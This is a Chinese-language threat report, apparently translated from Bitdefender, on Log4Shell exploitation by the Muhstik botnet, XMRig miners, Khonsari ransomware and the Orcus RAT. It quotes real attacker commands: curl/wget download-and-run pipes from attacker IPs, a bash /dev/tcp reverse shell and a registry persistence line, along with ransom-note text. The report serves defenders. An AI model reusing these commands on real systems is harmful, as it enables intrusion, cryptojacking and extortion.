BitDefender 发现首个利用Log4Shell漏洞的勒索病毒 一大波攻击已经在路上

纽盖特

2021 年 12 月 9 日，Apache 披露了 Log4j 远程代码执行漏洞 CVE-2021-44228，其严重度为 10分（最高风险评分）。

Log4Shell PoC 发布后，攻击者立即开始扫描 Internet，寻找易受攻击的目标。Bitdefender mi-guan看到攻击者试图破坏不同的网络服务。使用 Log4Shell 的总扫描次数在一天内增加了三倍，这意味着攻击才刚刚开始。虽然大多数扫描没有特定目标，但大约 20% 的攻击似乎是搜索易受攻击的 Apache Solr 服务。

当 Bitdefender 的全球mi-guan网络出现明显的活动高峰时，这通常意味着攻击者正在积极寻找尽快将新发现的漏洞武器化的方法。我们现在看到的大多数扫描都来自俄罗斯的 IP 地址。

真实攻击检测
自 12 月 10 日以来，Bitdefender 观察到对我们mi-guan的各种攻击，但我们也检测到对运行 Bitdefender 端点保护代{过}{滤}理的机器的真实攻击。通过漏洞利用获得初始访问权，然后进行加密劫持。

以下检测基于来自全球数亿个传感器的 Bitdefender 遥测数据，而不是基于mi-guan的数据或僵尸网络中的流量监控。

1. Muhstik 僵尸网络

一些僵尸网络已经在利用这个漏洞。僵尸网络以服务器为目标，以部署后门、扩展其僵尸网络网络（具有连接良好的 Internet 服务器）并部署加密矿工。大规模部署对于这些僵尸网络运营商的成功至关重要。监控僵尸网络活动通常可以很好地预测新 RCE 的真正危险程度和潜在的攻击规模。

在我们的遥测中，确定了 Muhstik 僵尸网络是早期攻击者之一。

攻击者正在使用恶意类文件来执行命令。shell 脚本尝试下载多个 ELF（可执行和可链接格式）文件和 shell 脚本，然后执行它们。这些脚本的目的是安装 Muhstik 僵尸网络并部署挖矿软件。

• 
  

hxxp://45.130.229[.]168:9999/Exploit.classcurl hxxp://18.228.7[.]109/.log/log | shbr

Muhstik僵尸网络部署流程：

这些文件被Bitdefender检测为：

• GenericKD.47627843
• Gen:Variant.Trojan.Linux.Gafgyt.22
• Linux.Zojfor.A.
  
  

类文件被Bitdefender检测为：

• GenericKD.47627832
  
  

2. XMRIG矿工

我们还检测到试图部署 XMRIG 矿工的攻击者， Bitdefender EDR 检测到了异常攻击：

此进程执行命令下载脚本文件wsnbb.sh

• 
  

cmd /C "(curl -s hxxp://158.247.218[.]44:8000/wsnbb.sh||wget -q -O- hxxp://154.247.218[.]44:8000/wsnbb.sh) | bashbr

此脚本然后尝试从 GitHub 部署 XMRIG 矿工：

Bitdefender EDR 检测到此行为：

•     NotExists.1.Process.NewSubprocessesStarted
  
  

XMRIG 矿工被检测为：

•     Gen:Variant.Application.Linux.Miner.3 (Linux)
•     Gen:Variant.Application.Miner.2 (Windows)
•     Application.MAC.Generic.194 (macOS)
  
  

3. 新的勒索病毒家族 Khonsari

虽然目前观察到的大多数攻击似乎都是针对 Linux 服务器，但我们也看到了针对运行 Windows 操作系统的系统的攻击。对于这些攻击，我们检测到部署Khonsari 勒索软件的攻击。

这次利用 Log4j 漏洞的尝试使用恶意的 hxxp://3.145.115[.]94/Main.class 类来下载额外的payload。12 月 11 日星期日，Bitdefender 观察到此有效载荷是从 hxxp://3.145.115[.]94/zambo/groenhuyzen.exe 下载的恶意 .NET 二进制文件。这是一个新的勒索软件系列，被勒索加密的文件扩展名为 Khonsari。

执行后，恶意文件将列出所有驱动器并对其进行完全加密，但 C:\ 驱动器除外。在 C:\ 驱动器上，Khonsari 将仅加密以下文件夹：

• C:\Users\<user>\Documents
• C:\Users\<user>\Videos
• C:\Users\<user>\Pictures
• C:\Users\<user>\Downloads
• C:\Users\<user>\Desktop
  
  

扩展名为 .ini 和 .lnk 的文件将被忽略。用于加密的算法是使用 PaddingMode.Zeros 的 AES 128 CBC。加密后，扩展名 .khonsari 添加到每个文件中。

勒索赎金票据写在 C:\Users\<user>\Desktop\HOW TO GET YOUR FILES BACK.TXT ，用记事本打开：

Your files have been encrypted and stolen by the Khonsari family.If you wish to decrypt , call (***) ***-1309 or email kar***ari@gmail.com.If you do not know how to buy btc, use a search engine to find exchanges.DO NOT MODIFY OR DELETE THIS FILE OR ANY ENCRYPTED FILES. IF YOU DO, YOUR FILES MAY BE UNRECOVERABLE.

还有一个到 hxxp://3.145.115[.]94/zambos_caldo_de_p.txt 的 GET 请求。响应未在二进制代码中使用，我们假设执行 GET 请求是为了记录和监控目的。

勒索软件被检测为：

• GenericKD.47628589
  
  

类文件被检测为：

• GenericKD.38253445
  
  

4. Orcus 远控木马

12 月 13 日星期一，Bitdefender 使用相同的 URL hxxp://3.145.115[.]94/Main.class 观察到了另外一次下载新payload的尝试。然而，这一次 Main.class 尝试从 hxxp://test.verble[.]rocks/dorflersaladreviews.jar 下载新的有效载荷。

.jar 文件复制到 C:\Users\<user>\AppData\Local\Adobe\fengchenteamchina.class 下，并使用以下命令设置持久性：

• 
  

reg.exe add "hkcu\software\microsoft\windows\currentversion\run" /v "adobe telemetry agent" /t reg_sz /f /d "c:\program files (x86)\common files\oracle\java\javapath\javaw.exe -jar c:\users\<user>\appdata\local\adobe\fengchenteamchina.class peedee"br

它从 hxxp://test.verble.rocks/dorflersaladreviews.bin.encrypted 下载 shellcode 并将其注入 conhost.exe 进程的内存中。在这里，shellcode 解密并将另一个恶意负载加载到内存中，它似乎是连接到 test.verble[.]rocks 命令和控制服务器的 Orcus 远程访问木马 (RAT)。

类文件被Bitdefender检测为：

• GenericKD.38268017
  
  

jar 文件被Bitdefender检测为：

• GenericKD.38267576
  
  

shellcode文件被Bitdefender检测为：

• Agent.FQSI
• DonutLoader.A
  
  

Orcus RAT 被Bitdefender检测为：

• Gen:Variant.MSILPerseus.207255
  
  
  

5. 反弹 Shell

获得立足点以供以后利用是我们在 0 日漏洞利用之后看到的趋势。在这些易受攻击的服务器上部署反弹 shell 是一个简单的操作，随后可以进行全面攻击。

在我们看到的其中一种攻击中，恶意的 hxxp://152.32.216[.]78/Exploit.class 类文件用于执行以下命令行：

解密后的命令就是下面命令行的执行。此命令的结果是建立一个反弹bash shell。

• 
  

/bin/bash -i > /dev/tcp/152.32.216[.]78/7777 0<&1 2>&1br

这种攻击的简单性表明将 Log4j 漏洞武器化是多么容易。

Bitdefender EDR 检测到此行为为：

• BashReverseShell
  
  

类文件被检测为：

• GenericKD.47629137
  
  
  

请采取行动

Bitdefender 强烈建议其客户立即采取行动并部署行业供应商建议中推荐的所有现有补丁和缓解措施。我们还建议采取以下行动：

• 进行广泛的基础设施和软件应用程序审计，以识别实施 Apache Log4j2 日志记录框架的所有系统。然后，立即将这些部署升级到 Log4j 版本 2.16.0（2021 年 12 月 14 日更新的建议，因为 2.15 现已被 Apache 报告为容易受到拒绝服务攻击）并部署 Apache 推荐的配置缓解措施，本文中的更多详细信息.
• 查看您的软件供应链和软件材料清单。从开源软件项目维护者或商业软件制造商处为所有受影响的系统寻求缓解对策或补丁。对于在面向 Internet 的系统上运行的软件尤其如此，但由于此漏洞的严重性造成横向攻击威胁，因此不应仅限于此类系统。
• 实施纵深防御方法。截至目前，攻击由多个阶段组成，为安全团队提供了防止安全事件演变为安全漏洞的好机会。在我们的遥测中，我们看到了各种阻止漏洞利用的模块，从网络级保护（URL/IP 信誉）、静态反恶意软件（检测矿工或已知恶意负载）到用于检测可疑进程行为的高级威胁防御。
• 积极监控基础设施以发现潜在的利用企图并做出相应的响应。实施 Bitdefender EDR 解决方案，寻找任何反弹TCP shell 的迹象，并检查任何检测到的异常。
• Bitdefender企业版的风险分析模块可以识别机器上是否存在易受攻击的 Log4j 库版本。
  
  

需要注意的是，这是一个高度动态的情况，许多软件供应商和开源项目仍在调查其软件材料清单中 Log4j2 的存在，预计在未来几天和几周内会提供其他建议。因此，密切监视供应商更新应该是您正在进行的缓解工作的关键部分。

目前尚未发现此漏洞对Bitdefender产品和服务的客户构成的额外风险。我们将继续积极监控并在需要时部署任何必要的缓解对策。